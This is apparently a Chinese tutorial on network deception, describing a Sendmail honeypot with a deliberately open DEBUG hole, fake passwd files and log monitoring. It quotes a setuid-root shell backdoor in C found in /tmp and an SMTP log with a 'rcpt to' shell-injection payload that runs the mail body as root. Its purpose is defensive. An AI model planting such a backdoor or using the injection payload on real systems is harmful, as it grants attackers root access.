战术实例讲解 网络欺骗的方法以及攻防(2)

　　二、欺骗实例之“诱敌深入”

　　相信很多朋友都知道，邮件服务器软件Sendmail中有个安全漏洞，入侵者如果熟悉邮件服务器软件Sendmail，他肯定会试探着攻击。据说只要收到被做过手脚的邮件，邮件服务器设备管理员的权限就有可能被篡夺。由于可以通过邮件进行攻击，因此很难用防火墙等防范。尤其是基本上所有版本的Sendmail都受到影响，因此我们决定使用邮件服务器软件Sendmail作为诱饵。在这个实例中，将会使用到上面所介绍的一些欺骗技术。

　　1、关于Sendmail的一些知识

　　Sendmail作为 Linux、BSD和其他Unix平台的“标配”，被广泛使用。使用Sendmail很重要的一条是，必须记得随时了解他的站点动态，在http://www.sendmail.org这个网站公布了关于sendmail的一些最新版本和相关信息，http://www.sendmail.org/8.13.0.Alpha0.html是目前的最新测试版本。作为一个相当普及的软件，再加上众多的相关软件支持，配置Sendmail可以算得上系统管理员的基本技能之一了。

　　Sendmail 主要的配置文件如下:

　　/etc/sendmail.cf是Sendmail 核心配置文件;

　　/etc/aliases是邮件别名文件;

　　/etc/mail/relay-domains用于设定可RELAY的域名;

　　/etc/mail/access用来设定处理来信的方式如RELAY等;

　　在默认情况下，也就是安装Sendmail服务器不做任何设置的情况下，则只能在本机上收发邮件，网络上其它主机不能向该SMTP服务器发送邮件。关于Sendmail的具体安装配置过程，我们可以通过http://www.worldhello.net/doc/email_howto/sendmail.html这个网址得到比较满意的答案。

　　2、序幕

　　为了给黑客们一个惊喜，我们故意留出了一个DUBUG漏洞，张开网后，就等鱼儿上钩了。大概一个多月都没有动静，终于，在我们无意中间接公布了一些系统的消息后，发现系统出了异常的日志是在2004年2月14日，可能是由于

　　这个黑客十分有耐心，手段也很高明。一切在意料之中，我们在机器的/tmp目录下又发现了一个程序，而且只要运行这个程序，就会轻易得到用户权限。根据我们自己掌握的情况，这种方法在网上几乎是最受欢迎的了。不过，对于系统用户来说，定期清理/tmp下的文件是很正常的，因此即使我们清理这个文件，他也不会感到意外。我们打开在 /tmp 目录下放置 的C源程序进行了研究:

以下是引用片段： <++> backdoor/backdoor2.c #include  main() { system("cp /bin/sh /tmp/fid"); system("chown root.root /tmp/fid"); system("chmod 4755 /tmp/fid"); } <-->

　　很明显，这是一个后门程序，通过这个程序可以获得一些关于根用户的相关属性，这对黑客来说是一个刺激，对我们管理员来说，既然要“诱敌深入”做个测试，就肯定也存在一定挑战了。而现在我们所要做的，就是引诱一个黑客到一个我们设计好的环境中，记录下来他的所有动作，研究其行为，并提醒他的下一个目标作出防范。除了在机器上设置记录日志并隐藏这些日志，我们还添加了一些虚假的服务在系统上。由于每天定时产生的日志量非常大，为了有针对地了解攻击动向，我们做了一个script文件用来检索每天的日志。其中，我们主要检查以下几点:

　　Telnet/login服务检查:如果有黑客试图进入我们的系统，他肯定要尝试很多帐户和密码，这样他的一举一动都会被我们记录下来。当然，由于试探的人比较多，五花八门三教九流，水平太次的人我们是不会给他机会的。然后就是探测Guest / visitor 账号，黑客们第一个寻找的就是公用账号。这些账号提供了友好的、最轻易地获取几乎系统的所有文件的机会，包括passwd文件。黑客也可以通过获取/etc/hosts.equiv文件或每个用户的.rhosts文件来获得机器的信任主机列表。

　　FTP服务检索:检索的工具会报告每天所有注册和试图注册的用户名。我们伪造了一个passwd文件，获取passwd的人通常用它来获得系统的正式用户的注册名称，然后攻击、破解其密码。

　　SMTP DEBUG:这个命令提供了两个守候sendmail的漏洞的陷阱。虽然几乎所有的产品出售商都清除了这个漏洞，但偶尔仍有黑客尝试它。这个漏洞允许外部的使用者使用一段以root权限执行的script。当有些人尝试这个漏洞时，我就获得了他尝试的script代码。

　　Finger:Finger提供了大量有用的信息给黑客:账号名，该账号的最后一次使用时间，以及一些可以用来猜测密码的信息。由于我们的组织不允许提供这些信息给别人，我们置入了一个程序，在finger了fingerd的调用者后拒绝figner请求。(当然我们会避免对来自自己的finger信息的死循环)。报告表明每天有数以十计的finger请求，其中大部分是合法的。很多探测器都使用figner命令来查明调用的机器和使用者。

　　3、较量

　　设置好上面的服务以后，由于我们的目标有点暴露，因此被攻击率比较高。但是，当一个远程使用者取走passwd文件时，并不是所有的人都出于恶意的目的。就象我们生活在大千世界一样，每个人的想法不一定相同。从这些日志所记录的事件里面，我们可以发现很多人的不同心理，或善意，或好奇，或者出于成就感。为了给黑客一个提醒，我们设置了一个自动回信，大致内容是:

　　“如果你到了这个地方，就已经很不错了，如果你希望继续，我们也可以陪你玩玩。如果我们现在正看着你的操作，感觉如何?”。

　　不过，对于高手来说，这招并不一定能奏效。下面的日志，记录了两个邮件发送器的相互对话，整个心理过程可以从中窥探出来。

以下是引用片段： 00:43:10 smtpd[27466]: <--- 220 xxx.xxx.com SMTP 00:43:14 smtpd[27466]: -------> debug 00:43:14 smtpd[27466]: DEBUG attempt 00:43:14 smtpd[27466]: <--- 200 OK 00:43:25 smtpd[27466]: -------> mail from: 00:43:25 smtpd[27466]: <--- 503 Expecting HELO 00:43:34 smtpd[27466]: -------> helo 00:43:34 smtpd[27466]: HELO from 00:43:34 smtpd[27466]: <--- 250 xxx.xxx.com 00:43:42 smtpd[27466]: -------> mail from:  00:43:42 smtpd[27466]: <--- 250 OK 00:43:59 smtpd[27466]: -------> rcpt to: 00:43:59 smtpd[27466]: <--- 501 Syntax error in recipient name 00:44:44 smtpd[27466]: -------> rcpt to:<|sed -e '1,/?$/'d | /bin/sh ; exit 0"> 00:44:44 smtpd[27466]: shell characters: |sed -e '1,/?$/'d | /bin/sh ; exit 0" 00:44:45 smtpd[27466]: <--- 250 OK 00:44:48 smtpd[27466]: -------> data 00:44:48 smtpd[27466]: <--- 354 Start mail input; end with . 00:45:04 smtpd[27466]: <--- 250 OK 00:45:04 smtpd[27466]: /dev/null sent 48 bytes to upas.security 00:45:08 smtpd[27466]: -------> quit 00:45:08 smtpd[27466]: <--- 221 xxx.xxx.com Terminating 00:45:08 smtpd[27466]: finished.

　　这是我们对SMTP过程的日志。在这个例子中，另一端是由人来键入命令。入侵者尝试的第一个命令是DEBUG。当他接收的“250 OK”的回应时一定很惊奇。关键的行是“rcpt to :”。在尖括号括起的部分通常是一个邮件接收器的地址。这里它包含了一个命令行。在DEBUG模式下，Sendmail可以用它来以ROOT身份执行一段命令。即:

以下是引用片段： sed -e '1,/?$/'d | /bin/sh ; exit 0"

　　它去掉了邮件头的信息，并使用ROOT身份执行了消息体，这样可以隐藏一些关于他的信息。之后，这个入侵者试探着从我们的服务器上取得一些密码和账户文件，于是我们编造了一份假文件，给他发过去，密文破解后的意思是:“小心玩火自焚!”。